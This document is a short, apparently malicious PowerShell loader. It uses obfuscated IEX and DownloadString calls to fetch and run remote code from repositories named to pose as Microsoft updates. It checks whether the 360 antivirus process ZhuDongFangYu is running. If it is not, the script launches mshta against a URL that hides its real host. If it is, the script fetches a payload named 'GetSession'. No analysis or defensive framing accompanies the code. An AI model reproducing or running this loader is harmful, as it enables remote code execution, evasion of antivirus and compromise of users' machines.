IEX (New-Object System.Net.Webclient)."Downloa`dString"('ht'+'tps://raw.githubusercontent.com/MicrosoftUpdate/Update_181115/master/Download')
			
$id = Get-Process -name ZhuDongFangYu* | Select-Object id | ForEach-Object -Process{$_.id}
			
if($id -eq $null) {
			
C:\Windows\SysWOW64\mshta.exe https://10.0.0.1:123@min.gitcdn.link/repo/MicrosoftUpdate/Update_181115/master/Patchx86

}
			
else{
			
IEX (New-Object System.Net.Webclient)."Downloa`dString"('ht'+'tps://raw.githubusercontent.com/MicrosoftUpdate/Update_181115/master/GetSession')
	
}

